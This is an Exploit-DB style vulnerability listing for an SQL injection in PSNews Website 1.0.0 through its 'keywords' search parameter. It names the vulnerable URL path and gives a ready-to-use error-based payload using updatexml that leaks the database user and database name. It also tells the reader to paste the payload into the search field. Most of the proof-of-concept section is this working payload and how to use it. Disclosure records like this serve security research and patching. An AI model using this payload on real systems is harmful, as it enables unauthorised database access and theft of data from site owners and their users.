PSNews Website (Same Backend with Mobile Apps) 1.0.0 - 'Keywords' SQL Injection

vendor:

PSNews Website (Same Backend with Mobile Apps)

by:

Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com

N/A

CVSS

N/A

SQL Injection

CWE

Product Name: PSNews Website (Same Backend with Mobile Apps)

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists:

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Webapps

2018

PSNews Website (Same Backend with Mobile Apps) 1.0.0 – ‘Keywords’ SQL Injection

The vulnerability allows an attacker to inject SQL commands.

Mitigation:

Source

Exploit-DB raw data:

# Exploit Title:  PSNews Website (Same Backend with Mobile Apps) 1.0.0 - 'Keywords' SQL Injection
# Dork: N/A
# Date: 2018-02-16
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/psnews-website/21360354?s_rank=9
# Version: 1.0.0
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :

SQLI :

http://server/index.php/search

# Parameter : keywords (POST)
#    Type: Error based
#    Title:  Mysql >= 5.6.33 AND Error based - updatexml (XPATH query)
#    Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)
#######################################
# Discrption : Put this payload in the search field.then you will have
XPATH syntax error in the next page.

Test : http://server/index.php/search
Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)